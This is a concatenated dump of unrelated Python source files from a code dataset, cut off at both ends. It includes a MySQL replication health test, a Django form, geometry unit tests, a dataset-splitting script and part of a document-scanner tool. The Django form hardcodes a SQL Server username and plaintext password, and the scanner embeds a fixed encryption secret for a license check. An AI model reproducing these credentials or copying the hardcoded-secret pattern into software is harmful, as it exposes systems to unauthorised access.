df.loc[df.SIG_CD == SIG_CD, 'SIG_ENG_NM'] = df.loc[df.SIG_CD == SIG_CD, 'SIG_ENG_NM'].iloc[0]\n df.loc[df.SIG_CD == SIG_CD, 'SIG_KOR_NM'] = df.loc[df.SIG_CD == SIG_CD, 'SIG_KOR_NM'].iloc[0]\n\ndf.to_csv('csv/KOREA-ADDR-WGS84.csv', index=False)\n","sub_path":"addresskr/json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"81392094","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\nimport traceback\n\nfrom fuel_health.common.ssh import Client as SSHClient\nfrom fuel_health.common.utils import data_utils\nimport fuel_health.test\n\nLOG = logging.getLogger(__name__)\n\n\nclass TestMysqlReplication(fuel_health.test.BaseTestCase):\n @classmethod\n def setUpClass(cls):\n super(TestMysqlReplication, cls).setUpClass()\n cls.controller_ip = cls.config.compute.online_controllers[0]\n cls.controllers = cls.config.compute.online_controllers\n cls.controller_key = cls.config.compute.path_to_private_key\n cls.controller_user = cls.config.compute.ssh_user\n cls.mysql_user = 'root'\n cls.database = 'ost1' + str(data_utils.rand_int_id(100, 999))\n cls.master_ip = []\n\n def setUp(self):\n super(TestMysqlReplication, self).setUp()\n if 'ha' not in self.config.compute.deployment_mode:\n self.skipTest('Cluster is not HA mode, skipping tests')\n if len(self.controllers) == 1:\n self.skipTest('There is only one controller online. '\n 'Nothing to check')\n\n @classmethod\n def tearDownClass(cls):\n if cls.master_ip:\n try:\n cmd = \"mysql -e 'DROP DATABASE %s'\" % cls.database\n\n SSHClient(cls.master_ip[0], cls.controller_user,\n key_filename=cls.controller_key).exec_command(cmd)\n except Exception:\n LOG.debug(traceback.format_exc())\n\n def test_mysql_replication(self):\n \"\"\"Check data replication over mysql\n Target Service: HA mysql\n\n Scenario:\n 1. Detect mysql node.\n 2. Create database on detected node\n 3. Create table in created database\n 4. Insert data to the created table\n 5. Get replicated data from each controller.\n 6. Verify that replicated data in the same from each controller\n 7. Drop created database\n Duration: 100 s.\n \"\"\"\n # Find mysql master node\n master_node_ip = []\n cmd = 'mysql -e \"SHOW SLAVE STATUS\\G\"'\n LOG.info(\"Controllers nodes are %s\" % self.controllers)\n for controller_ip in self.controllers:\n ssh_client = SSHClient(\n controller_ip, self.controller_user,\n key_filename=self.controller_key, timeout=100)\n output = self.verify(\n 20, ssh_client.exec_command, 1,\n 'Can not connect to mysql. 
'\n 'Please check that mysql is running and there '\n 'is connectivity by management network',\n 'detect mysql node', cmd)\n LOG.info('output is %s' % output)\n if not output:\n self.master_ip.append(controller_ip)\n master_node_ip.append(controller_ip)\n\n database_name = self.database\n table_name = 'ost' + str(data_utils.rand_int_id(100, 999))\n record_data = str(data_utils.rand_int_id(1000000000, 9999999999))\n\n create_database = 'mysql -e \"CREATE DATABASE IF NOT EXISTS %s\"'\\\n % database_name\n create_table = 'mysql -e \"CREATE TABLE IF NOT EXISTS'\\\n ' %(database)s.%(table)s'\\\n ' (data VARCHAR(100))\"'\\\n % {'database': database_name,\n 'table': table_name}\n create_record = 'mysql -e \"INSERT INTO %(database)s.%(table)s (data)'\\\n ' VALUES(%(data)s)\"'\\\n % {'database': database_name,\n 'table': table_name,\n 'data': record_data}\n get_record = 'mysql -e \"SELECT * FROM %(database)s.%(table)s '\\\n 'WHERE data = \\\"%(data)s\\\"\"'\\\n % {'database': database_name,\n 'table': table_name,\n 'data': record_data}\n\n # create db, table, insert data on master\n LOG.info('master node ip %s' % master_node_ip[0])\n master_ssh_client = SSHClient(master_node_ip[0], self.controller_user,\n key_filename=self.controller_key,\n timeout=100)\n\n self.verify(20, master_ssh_client.exec_command, 2,\n 'Database creation failed', 'create database',\n create_database)\n LOG.info('create database')\n self.verify(20, master_ssh_client.exec_command, 3,\n 'Table creation failed', 'create table', create_table)\n LOG.info('create table')\n self.verify(20, master_ssh_client.exec_command, 4,\n 'Can not insert data in created table', 'data insertion',\n create_record)\n LOG.info('create data')\n\n # Verify that data is replicated on other controllers\n for controller in self.controllers:\n if controller not in master_node_ip:\n client = SSHClient(controller,\n self.controller_user,\n key_filename=self.controller_key)\n\n output = self.verify(\n 20, client.exec_command, 5,\n 'Can not get data from controller %s' % controller,\n 'get_record', get_record)\n\n self.verify_response_body(output, record_data,\n msg='Expected data missing',\n failed_step='6')\n\n # Drop created db\n cmd = \"mysql -e 'DROP DATABASE %s'\" % self.database\n ssh_client = SSHClient(master_node_ip[0], self.controller_user,\n key_filename=self.controller_key)\n self.verify(20, ssh_client.exec_command, 7,\n 'Can not delete created database',\n 'database deletion', cmd)\n self.master_ip = []\n","sub_path":"fuel_health/tests/ha/test_mysql_replication.py","file_name":"test_mysql_replication.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157912227","text":"from django.core.exceptions import ValidationError\nfrom django import forms\n\ndef valid_show(value):\n if '0' == value:\n raise ValidationError('Choose a show')\n\ndef valid_passw(value):\n if '?' 
in value:\n raise ValidationError('?')\n\ndef valid_vlan(value):\n if value == 207 or value > 704 and value < 715:\n pass\n else:\n raise ValidationError('Wrong VLAN')\n\ndef valid_wid(value):\n if value == None or value > 99 and value < 121:\n pass\n else:\n raise ValidationError('Wrong WID')\n\n\nclass addssidForm(forms.Form):\n\n RADIO_LIST = (\n ('1', '2.4 GHz'),\n ('2', '5.0 GHz'),\n )\n\n AP_LIST1 = []\n AP_LIST2 = []\n AP_LIST3 = []\n AP_LIST4 = []\n f = open('C:\\\\webs\\\\mysite\\\\tempinfo\\\\level1.txt', 'r')\n addssid = f.readlines()\n f.close()\n for ap in addssid:\n if '#lev' in ap:\n LEVEL = ap\n else:\n if '1' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST1.append((ap,ap1))\n if '2' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST2.append((ap,ap1))\n if '3' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST3.append((ap,ap1))\n if '4' in LEVEL:\n ap1 = ap.replace('-',' ')\n if '_4' in ap:\n ap1 = 'Beehive'\n ap1 = ap1.replace('_',' ')\n AP_LIST4.append((ap,ap1))\n\n show = forms.ChoiceField(choices=[])\n\n def __init__(self, *args, **kwargs):\n try:\n import pyodbc\n sqlconn = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER=nyccoc-sql-02;DATABASE=ShowDB;UID=ShowDBuser;PWD=zQ+GZ*[z!EtCXv5)')\n cur = sqlconn.cursor()\n sql = \"\"\"SELECT name FROM shows WHERE GETDATE() between dateadd(day, -7, move_in) and dateadd(day, 3, move_out) ORDER BY move_in\"\"\"\n cur.execute(sql)\n item = cur.fetchone()\n SHOW_LIST = []\n SHOW_LIST.append(('', 'SELECT SHOW'))\n\n while item is not None:\n item = str(item)[2:-4]\n SHOW_LIST.append((item, item))\n item = cur.fetchone()\n except:\n SHOW_LIST = [('0','Cannot Connect to SQL Server')]\n\n super(addssidForm, self).__init__(*args, **kwargs)\n self.fields['show'] = forms.ChoiceField(choices=SHOW_LIST,\n validators=[valid_show])\n\n\n name = forms.CharField(\n required=True,\n max_length=30,)\n\n passw = forms.CharField(\n required=False,\n min_length=8,\n max_length=30,\n validators=[valid_passw])\n\n vlan = forms.IntegerField(\n initial=207,\n validators=[valid_vlan])\n\n frequency = forms.CharField(\n required=True,\n widget=forms.CheckboxSelectMultiple(\n choices=RADIO_LIST,\n attrs={'checked' : 'checked'}))\n\n wid = forms.IntegerField(\n required=False,\n validators=[valid_wid])\n\n apgroups1 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST1,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups2 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST2,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups3 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST3,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups4 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST4,\n attrs={'unchecked': 'unchecked'}\n ))\n\n def clean(self):\n cleaned_data = super(addssidForm, self).clean()\n ap1 = cleaned_data.get(\"apgroups1\")\n ap2 = cleaned_data.get(\"apgroups2\")\n ap3 = cleaned_data.get(\"apgroups3\")\n ap4 = cleaned_data.get(\"apgroups4\")\n aps = ap1+ap2+ap3+ap4\n if aps == \"\":\n raise ValidationError('No APs')\n","sub_path":"addssid/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22111925","text":"\"\"\"Unit tests for discrete_surfaces modules.\"\"\"\n\nimport 
geomstats.backend as gs\nfrom tests.conftest import Parametrizer, autograd_backend, pytorch_backend\nfrom tests.data.discrete_surfaces_data import (\n DiscreteSurfacesTestData,\n ElasticMetricTestData,\n)\nfrom tests.geometry_test_cases import ManifoldTestCase, RiemannianMetricTestCase\n\n\nclass TestDiscreteSurfaces(ManifoldTestCase, metaclass=Parametrizer):\n testing_data = DiscreteSurfacesTestData()\n\n def test_vertex_areas(self, faces, point):\n \"\"\"Test vertex_areas.\n\n Vertex area is the area of all of the triangles who are in contact\n with a specific vertex, according to the formula:\n vertex_areas = 2 * sum_incident_areas / 3.0\n\n We test this on a space whose initializing\n point is a cube, and we test the function on\n a cube with sides of length 2 centered at the origin.\n\n The cube is meshed with triangles, so each face should\n have area 2.\n \"\"\"\n number_of_contact_faces = gs.array([3, 5, 5, 5, 5, 5, 3, 5])\n triangle_area = 0.5 * 2 * 2\n expected = 2 * (number_of_contact_faces * triangle_area) / 3\n space = self.Space(faces)\n\n result = space.vertex_areas(point)\n assert result.shape == (8,)\n assert expected.shape == (8,)\n assert gs.allclose(result, expected), result\n\n point = gs.array([point, point])\n expected = gs.array([expected, expected])\n result = space.vertex_areas(point)\n assert point.shape == (2, 8, 3)\n assert result.shape == (2, 8), result.shape\n assert gs.allclose(result, expected), result\n\n def test_normals(self, faces, point):\n \"\"\"Test normals.\n\n We test this on a space whose initializing\n point is a cube, and we test the function on\n a cube with sides of length 2 centered at the origin.\n The cube is meshed with 12 triangles (2 triangles\n per face.)\n\n Recall that the magnitude of each normal vector is equal to\n the area of the face it is normal to.\n\n We compare the abs value of each normal vector array because:\n note that the \"normals\" variable here calculates the normals\n as pointing out of the surface, but the way that normals()\n was constructed makes it so that the normal vector could be\n pointing into the surface or out of the surface, (so it could\n either be positive or negative). 
Because of this, we make all\n of the normal vectors to the cube positive for testing\n purposes.\n \"\"\"\n space = self.Space(faces=faces)\n cube_normals = gs.array(\n [\n [0.0, 0.0, 2.0],\n [0.0, 0.0, 2.0],\n [0.0, 2.0, 0.0],\n [0.0, 2.0, 0.0],\n [2.0, 0.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, -2.0, 0.0],\n [0.0, -2.0, 0.0],\n [-2.0, 0.0, 0.0],\n [-2.0, 0.0, 0.0],\n [0.0, 0.0, -2.0],\n [0.0, 0.0, -2.0],\n ]\n )\n expected = cube_normals\n\n result = space.normals(point)\n are_close = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result, expected)\n ]\n\n assert gs.all(are_close)\n\n point = gs.array([point, point])\n result = space.normals(point)\n are_close_0 = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result[0], expected)\n ]\n are_close_1 = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result[1], expected)\n ]\n assert gs.all(gs.array([are_close_0, are_close_1]))\n\n def test_surface_one_forms(self, faces, point):\n \"\"\"Test surface one forms.\"\"\"\n space = self.Space(faces=faces)\n\n result = space.surface_one_forms(point=point)\n assert result.shape == (space.n_faces, 2, 3), result.shape\n\n first_vec = result[:, 0, :]\n second_vec = result[:, 1, :]\n inner_prods = gs.einsum(\"ni,ni->n\", first_vec, second_vec)\n result = [prod in [0.0, 4.0] for prod in inner_prods]\n assert gs.all(result)\n\n singleton_point = gs.expand_dims(point, axis=0)\n result = space.surface_one_forms(point=singleton_point)\n assert result.shape == (1, space.n_faces, 2, 3)\n\n point = gs.array([point, point])\n result = space.surface_one_forms(point=point)\n assert result.shape == (2, space.n_faces, 2, 3)\n\n first_vec = result[:, :, 0, :]\n second_vec = result[:, :, 1, :]\n inner_prods = gs.einsum(\"mni,mni->mn\", first_vec, second_vec)\n result = []\n for inner_prod in inner_prods:\n result.append([prod in [0.0, 4.0] for prod in inner_prod])\n assert gs.all(result)\n\n def test_faces_area(self, faces, point):\n \"\"\"Test faces area.\"\"\"\n space = self.Space(faces=faces)\n\n result = space.face_areas(point=point)\n expected = gs.array([4.0] * 12)\n assert result.shape == (space.n_faces,), result.shape\n assert gs.allclose(result, expected), result\n\n point = gs.array([point, point])\n result = space.face_areas(point=point)\n expected = gs.array([expected, expected])\n assert result.shape == (2, space.n_faces), result.shape\n assert gs.allclose(result, expected), result\n\n def test_surface_metric_matrices(self, faces, point):\n \"\"\"Test surface metric matrices.\"\"\"\n space = self.Space(faces=faces)\n result = space.surface_metric_matrices(point=point)\n assert result.shape == (\n space.n_faces,\n 2,\n 2,\n ), result.shape\n\n point = gs.array([point, point])\n result = space.surface_metric_matrices(point=point)\n assert result.shape == (2, space.n_faces, 2, 2)\n\n def test_laplacian(self, faces, point, tangent_vec, expected):\n \"\"\"Test laplacian operator.\"\"\"\n space = self.Space(faces=faces)\n\n n_vertices = point.shape[-2]\n result = space.laplacian(point=point)(tangent_vec)\n assert result.shape == (n_vertices, 3), result.shape\n\n assert gs.allclose(result, expected), result\n\n tangent_vec = gs.array([tangent_vec, tangent_vec])\n result = space.laplacian(point=point)(tangent_vec)\n assert result.shape == (2, n_vertices, 3), result.shape\n\n\nclass TestElasticMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n skip_all = not (autograd_backend() or pytorch_backend())\n skip_test_exp_shape = 
autograd_backend()\n skip_test_log_shape = autograd_backend()\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_after_log = True\n skip_test_exp_ladder_parallel_transport = True\n skip_test_log_after_exp = True\n skip_test_dist_is_positive = autograd_backend()\n skip_test_dist_point_to_itself_is_zero = autograd_backend()\n skip_test_exp_belongs = autograd_backend()\n skip_test_exp_geodesic_ivp = autograd_backend()\n skip_test_geodesic_bvp_belongs = autograd_backend()\n skip_test_geodesic_ivp_belongs = autograd_backend()\n skip_test_log_is_tangent = autograd_backend()\n skip_test_squared_dist_is_positive = autograd_backend()\n skip_test_dist_is_symmetric = True\n skip_test_dist_is_norm_of_log = True\n skip_test_triangle_inequality_of_dist = True\n skip_test_squared_dist_is_symmetric = True\n skip_test_covariant_riemann_tensor_is_skew_symmetric_1 = True\n skip_test_covariant_riemann_tensor_is_skew_symmetric_2 = True\n skip_test_covariant_riemann_tensor_bianchi_identity = True\n skip_test_covariant_riemann_tensor_is_interchange_symmetric = True\n skip_test_riemann_tensor_shape = True\n skip_test_scalar_curvature_shape = True\n skip_test_ricci_tensor_shape = True\n skip_test_sectional_curvature_shape = True\n\n testing_data = ElasticMetricTestData()\n\n def test_path_energy_per_time_is_positive(\n self, space, a0, a1, b1, c1, d1, a2, path, atol\n ):\n \"\"\"Check that energy of a path of surfaces is positive at each time-step.\n\n Parameters\n ----------\n space : DiscreteSurfaces\n Space of discrete surfaces associated with the ElasticMetric.\n a0, a1, b1, c1, d1, a2 : floats\n Parameters of the ElasticMetric.\n path : array-like, shape=[n_time_steps, n_vertices, 3]\n Path in the space of discrete surfaces.\n atol : float\n Absolute tolerance to test this property.\n \"\"\"\n n_times = len(path)\n space.equip_with_metric(self.Metric, a0=a0, a1=a1, b1=b1, c1=c1, d1=d1, a2=a2)\n\n energy = space.metric.path_energy_per_time(path)\n\n self.assertAllEqual(energy.shape, (n_times - 1, 1))\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n expected_shape = (2, n_times - 1, 1)\n path = gs.array([path, path])\n energy = space.metric.path_energy_per_time(path)\n self.assertAllEqual(energy.shape, expected_shape)\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n def test_path_energy_is_positive(self, space, a0, a1, b1, c1, d1, a2, path, atol):\n \"\"\"Check that energy of a path of surfaces is positive at each time-step.\n\n Parameters\n ----------\n space : DiscreteSurfaces\n Space of discrete surfaces associated with the ElasticMetric.\n a0, a1, b1, c1, d1, a2 : floats\n Parameters of the ElasticMetric.\n path : array-like, shape=[n_time_steps, n_vertices, 3]\n Path in the space of discrete surfaces.\n atol : float\n Absolute tolerance to test this property.\n \"\"\"\n space.equip_with_metric(self.Metric, a0=a0, a1=a1, b1=b1, c1=c1, d1=d1, a2=a2)\n\n energy = space.metric.path_energy(path)\n self.assertAllEqual(energy.shape, ())\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n path = gs.array([path, path])\n energy = space.metric.path_energy(path)\n self.assertAllEqual(energy.shape, (2,))\n result = gs.all(energy > -1 * atol)\n 
self.assertTrue(result)\n","sub_path":"tests/tests_geomstats/test_discrete_surfaces.py","file_name":"test_discrete_surfaces.py","file_ext":"py","file_size_in_byte":10341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"127196219","text":"import os\nimport shutil\nimport random\nimport collections\nimport pandas as pd\nfrom scipy.io import loadmat\nfrom PIL import Image\nfrom argparse import ArgumentParser\n\n\ndef get_gt(mat_data):\n # id: 0, objs: 3\n items = [(annots[0][0][0][0], annots[0][0][0][3]) for annots in mat_data]\n gt = []\n for item in items:\n objs = []\n for obj in item[1]:\n objs.append([obj[0][0][0][0][0], obj[0][0][0][1][0]])\n gt.append((item[0][0], objs))\n\n return gt\n\n\ndef get_img_size(img_path, gt):\n img_full_names = [\n os.path.realpath(os.path.join(img_path, item[0])) for item in gt]\n\n return [Image.open(img).size for img in img_full_names]\n\n\ndef bbox_norm(s, gt, l):\n for idx in range(len(s)):\n objs = gt[idx][1]\n for obj in objs:\n # xmin , ymin , xmax , ymax\n # obj[1][0], obj[1][1], obj[1][2], obj[1][3]\n # bbox = obj[1], idx_size = s[idx]\n\n # width = (x_max - x_min) / idx_size[0]\n width = float((obj[1][2] - obj[1][0]))\n # height = (y_max - y_min) / idx_size[1]\n height = float((obj[1][3] - obj[1][1]))\n # x_center = (x_min + width/2) / idx_size[0]\n x_center = float((obj[1][0] + width/2)) / s[idx][0]\n # y_center = (y_min + height/2) / idx_size[1]\n y_center = float((obj[1][1] + height/2)) / s[idx][1]\n\n # Update normalized bbox and binary label\n obj[1] = (x_center, y_center, width/s[idx][0], height/s[idx][1])\n obj[0] = l.index(obj[0])\n\n return gt\n\n\ndef find_labels(gt):\n checker = set()\n for img in gt:\n for item in img[1]:\n checker.add(item[0])\n\n return sorted(checker)\n\n\ndef check_dir(p):\n if os.path.exists(p):\n shutil.rmtree(p)\n os.makedirs(p, exist_ok=True)\n\n\ndef filt_cls(gts):\n filt_list = ['phone', 'coat', 'surfboard', 'watch', 'trees',\n 'ball', 'bag', 'sofa', 'glasses', 'roof', 'boat']\n rm_lst = []\n for gt in gts:\n for bbox in gt[1]:\n if bbox[0] in filt_list:\n rm_lst.append(gt)\n break\n for rm_elem in rm_lst:\n gts.remove(rm_elem)\n\n return gts\n\n\ndef cat_dist(gts):\n \"\"\"Calculate counts distribution of each categories\"\"\"\n counter = collections.Counter()\n for img, gt in gts:\n for name, bbox in gt:\n counter.update([name])\n\n return pd.Series(counter).sort_values(ascending=False)\n\n\ndef split_ds(gts, r=0.2):\n def tmp_cal(idxes):\n c = collections.defaultdict(lambda: 0)\n for i in idxes:\n for n, _ in gts[i][1]:\n c[n] += 1\n return c\n\n lbl_lst = cat_dist(gts)\n # Exclude top 3 classes, reverse\n balance_cls = lbl_lst[::-1]\n upper_bound = int(len(gts) * r)\n val_idx = set()\n added_lst = []\n for cls, counter in balance_cls.items():\n counter = int(counter * r) - tmp_cal(val_idx)[cls]\n for idx, (_, gt) in enumerate(gts):\n names = [n for n, _ in gt]\n include_added = bool(set(names).intersection(added_lst))\n if (counter <= 0) or (len(val_idx) > upper_bound):\n break\n elif (not include_added) and cls in names:\n val_idx.add(idx)\n counter -= sum([True for n in names if n == cls])\n added_lst.append(cls)\n\n val_ds = []\n for idx in val_idx:\n val_ds.append(gts[idx])\n\n return val_ds\n\n\ndef dump_labels(gt, lbl_path):\n check_dir(lbl_path)\n # item[0]: img_name, item[1]: annots\n for item in gt:\n path = os.path.join(lbl_path, item[0].split(\".\")[0]+\".txt\")\n with open(path, \"w\") as f:\n for obj in item[1]:\n _ = f.write(\"{} 
{:.6f} {:.6f} {:.6f} {:.6f}\\n\".format(\n obj[0], obj[1][0], obj[1][1], obj[1][2], obj[1][3]))\n\n\ndef dump_names(l, path):\n with open(path, \"w\") as f:\n for name in l:\n _ = f.write(f\"{name}\\n\")\n\n\ndef dump_ds_file(gts, t_file_path, v_file_path, img_path):\n val_ds = split_ds(gts)\n train_ds = [gt for gt in gts if gt not in val_ds]\n random.seed(82)\n random.shuffle(train_ds)\n print(len(gts))\n print(len(train_ds))\n print(len(val_ds))\n with open(t_file_path, \"w\") as f:\n for img in train_ds:\n _ = f.write(\"{}\\n\".format(os.path.join(img_path, img[0])))\n\n with open(v_file_path, \"w\") as f:\n for img in val_ds:\n _ = f.write(\"{}\\n\".format(os.path.join(img_path, img[0])))\n\n\ndef dump_data_file(path, cls_len, train, val, name):\n with open(path, \"w\") as f:\n _ = f.write(f\"classes={cls_len}\\n\")\n _ = f.write(f\"train={os.path.realpath(train)}\\n\")\n _ = f.write(f\"valid={os.path.realpath(val)}\\n\")\n _ = f.write(f\"names={os.path.realpath(name)}\\n\")\n\n\ndef run(params):\n if not os.path.exists(\"./data\"):\n raise ValueError(\"\\\"./data\\\" does not exist.\")\n if params['data_dir'] is None:\n raise ValueError(\"Please provide dataset directory\")\n mat_path = os.path.join(params['data_dir'], \"annotations.mat\")\n img_path = os.path.join(params['data_dir'], \"images/\")\n labels_path = os.path.join(params['data_dir'], \"labels/\")\n names_file_path = \"./data/unrel.names\"\n train_file_path = \"./data/unrel_train.txt\"\n val_file_path = \"./data/unrel_val.txt\"\n data_file_path = \"./data/unrel.data\"\n\n mat_data = loadmat(mat_path)\n ground_truth = get_gt(mat_data['annotations'])\n ground_truth = filt_cls(ground_truth)\n\n img_size = get_img_size(img_path, ground_truth)\n label_list = find_labels(ground_truth)\n normalized_gt = bbox_norm(img_size, ground_truth, label_list)\n\n if params['label_dir']:\n dump_labels(normalized_gt, labels_path)\n dump_names(label_list, names_file_path)\n dump_ds_file(normalized_gt, train_file_path, val_file_path, img_path)\n dump_data_file(data_file_path, len(label_list),\n train_file_path, val_file_path, names_file_path)\n\n\ndef param_loader():\n parser = ArgumentParser()\n parser.add_argument(\"--data_dir\", type=str,\n help=\"Path to dataset.\")\n parser.add_argument(\"--label_dir\", type=str, default=None,\n help=\"Path to label dir.\")\n args, _ = parser.parse_known_args()\n return vars(args)\n\n\nif __name__ == \"__main__\":\n p = param_loader()\n run(p)\n","sub_path":"data_balance/trans_dn_fmt_balanced.py","file_name":"trans_dn_fmt_balanced.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359993956","text":"import cv2\nimport numpy as np\nimport os\nimport sys\nimport scan\nimport traceback\n\nfrom Crypto.Cipher import AES \nfrom Crypto.Hash import SHA256\n\nimport argparse\nimport time\nimport datetime\nimport requests\n\nfrom tkinter import *\n\nimport img2pdf\n\nimport internet_checker\nimport subprocess\n\nimport re\nimport json\n\nfrom shutil import copyfile, rmtree\n\nimport psutil\nfrom urllib.request import urlopen\n\n##################\nimport tempfile\nclass SingleInstanceException(BaseException):\n pass\n\n\nclass SingleInstance(object):\n\n \"\"\"Class that can be instantiated only once per machine.\n\n If you want to prevent your script from running in parallel just instantiate SingleInstance() class. 
If there is another instance already running, it will throw a `SingleInstanceException`.\n\n    >>> import tendo\n    ... me = SingleInstance()\n\n    This option is very useful if you have scripts executed by crontab at short intervals.\n\n    Remember that this works by creating a lock file with a filename based on the full path to the script file.\n\n    Providing a flavor_id will augment the filename with the provided flavor_id, allowing you to create multiple singleton instances from the same file. This is particularly useful if you want specific functions to have their own singleton instances.\n    \"\"\"\n\n    def __init__(self, flavor_id=\"\", lockfile=\"\"):\n        self.initialized = False\n        if lockfile:\n            self.lockfile = lockfile\n        else:\n            basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace(\n                \"/\", \"-\").replace(\":\", \"\").replace(\"\\\\\", \"-\") + '-%s' % flavor_id + '.lock'\n            self.lockfile = os.path.normpath(\n                tempfile.gettempdir() + '/' + basename)\n\n        if sys.platform == 'win32':\n            try:\n                # file already exists, we try to remove (in case previous\n                # execution was interrupted)\n                if os.path.exists(self.lockfile):\n                    os.unlink(self.lockfile)\n                self.fd = os.open(\n                    self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)\n            except OSError:\n                type, e, tb = sys.exc_info()\n                if e.errno == 13:\n                    raise SingleInstanceException()\n                print(e.errno)\n                raise\n        else: # non Windows\n            import fcntl  # fcntl is POSIX-only; import it lazily here so the win32 branch never needs it\n            self.fp = open(self.lockfile, 'w')\n            self.fp.flush()\n            try:\n                fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n            except IOError:\n                raise SingleInstanceException()\n        self.initialized = True\n\n    def __del__(self):\n        if not self.initialized:\n            return\n        try:\n            if sys.platform == 'win32':\n                if hasattr(self, 'fd'):\n                    os.close(self.fd)\n                    os.unlink(self.lockfile)\n            else:\n                import fcntl  # POSIX-only, see __init__\n                fcntl.lockf(self.fp, fcntl.LOCK_UN)\n                # os.close(self.fp)\n                if os.path.isfile(self.lockfile):\n                    os.unlink(self.lockfile)\n        except Exception as e:\n            pass\n            #sys.exit(-1)\n##################\n\nDAILY_FILE = 'log.txt'\nJSON_FILE = 'record.json'\nVERSION = '5.0'\n\nsecret = 'pleasegivemoney!'\nhash_obj = SHA256.new(secret.encode('utf-8')) \nhkey = hash_obj.digest()\nkey_name = '.key'\n\nif getattr(sys, 'frozen', False):\n    base_path = sys._MEIPASS\n    key_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), key_name)\nelse:\n    base_path = \"\"\n    key_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), key_name)\n    \nSCALE_EXE = os.path.join(base_path, 'bin', 'scale.exe')\nSIMHEI_TTF = os.path.join(base_path, 'bin', 'simhei.ttf')\nPDFTOPRINTER_EXE = os.path.join(base_path, 'bin', 'PDFtoPrinter.exe')\nTRAIL_USE_DAY = 14\n\n#def encrypt(info):\n#    msg = info\n#    BLOCK_SIZE = 16\n#    PAD = \"{\"\n#    padding = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PAD\n#    cipher = AES.new(hkey, AES.MODE_ECB)\n#    result = cipher.encrypt(padding(msg).encode('utf-8'))\n#    return result \n#\n#def decrypt(info):\n#    msg = info\n#    PAD = \"{\"\n#    decipher = AES.new(hkey, AES.MODE_ECB)\n#    pt = decipher.decrypt(msg).decode('utf-8')\n#    pad_index = pt.find(PAD)\n#    result = pt[: pad_index]\n#    return result \n    \n#def integrity_test(window, text):\n#    if not os.path.exists(key_path):\n#        return False\n#    \n#    with open(key_path, 'rb') as f:\n#        plain_text = decrypt(f.read())\n#    \n#    uuid = subprocess.Popen(['wmic', 'csproduct','get' ,'UUID'],shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).stdout.read().decode('ascii')\n#    return str(plain_text[8:]) == uuid \n    \ndef LOG(info, text):\n    text.insert(\"insert\", str(info)+'\\n')\n    \ndef 
DEBUG(info, text):\n if args.debug:\n LOG(info, text)\n\ndef safe_remove(filename):\n safe_remove_count = 1\n while os.path.exists(filename):\n try:\n os.remove(filename)\n except:\n safe_remove_count += 1\n pass\n return safe_remove_count\n\ndef STEP_LOG(msg, path):\n log_update_sucess_retry = 0\n now = datetime.datetime.now()\n \n while log_update_sucess_retry < 10:\n try:\n now_str = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n msg = msg.encode('utf-8', 'ignore').decode('utf-8', 'ignore')\n with open(path, \"a\", encoding=\"utf-8\") as f:\n f.write('[%s] %s\\n' % (now_str, msg))\n break\n except:\n log_update_sucess_retry += 1\n \n try:\n if log_update_sucess_retry == 10:\n now_str = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n with open(path, \"a\") as f:\n f.write('[%s] tried to log 10 times but still fail\\n' % (now_str))\n except:\n pass\n \ndef worker(scanner, window, text):\n \n # Check Dropbox.exe is active\n dropbox_path1 = r'C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe'\n dropbox_path2 